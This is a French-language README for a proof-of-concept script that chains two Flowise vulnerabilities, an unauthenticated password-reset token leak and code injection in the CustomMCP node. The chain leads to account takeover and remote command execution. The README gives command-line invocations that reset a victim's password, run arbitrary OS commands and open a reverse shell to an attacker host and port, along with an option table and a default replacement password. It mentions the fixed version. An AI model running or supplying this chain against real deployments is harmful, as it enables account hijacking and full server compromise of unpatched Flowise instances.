
PoC de chaînage CVE-2025-58434 et CVE-2025-59528
Chaîne d'exploitation pour deux vulnérabilités affectant Flowise <= 3.0.5.
Le point d'accès « mot de passe oublié » renvoie un jeton de réinitialisation de mot de passe valide dans la réponse API sans nécessiter d'authentification. Un attaquant connaissant une adresse e-mail valide peut réinitialiser le mot de passe de n'importe quel compte sans interaction de l'utilisateur.
Le nœud CustomMCP transmet les entrées contrôlées par l'utilisateur directement à un constructeur Function() avec les privilèges complets de Node.js. Un utilisateur authentifié disposant d'une clé API valide peut exécuter des commandes OS arbitraires en tant qu'utilisateur du processus Flowise.
Corrigé dans : Flowise 3.0.6
pip install requestsChaîne ATO complète (réinitialise le mot de passe, demande la clé API, lance un reverse shell) :
python3 flowise_chain.py -t http://target -e [email protected]
RCE uniquement (si vous avez déjà une clé API) :
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
Reverse shell avec une clé existante :
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| Option | Description |
|---|---|
-t, --target | URL cible |
-e, --email | Email du compte cible (déclenche la chaîne ATO) |
--api-key | Fournir directement la clé API (ignore ATO) |
-c, --command | Commande à exécuter |
--lhost | IP de l'attaquant pour le reverse shell |
--lport | Port de l'attaquant pour le reverse shell (par défaut : 4444) |
--new-password | Mot de passe à définir lors de la réinitialisation (par défaut : Pwn3d!2026) |
-k, --insecure | Ignorer la vérification TLS |
En raison d'une particularité de Flowise 3.0.5, le point d'accès API de réinitialisation du mot de passe ne met pas immédiatement à jour les informations d'identification acceptées par le point d'accès de connexion. Le script effectue une pause après la réinitialisation et vous invite à vous connecter manuellement à l'interface utilisateur et à copier la clé API depuis /apikey.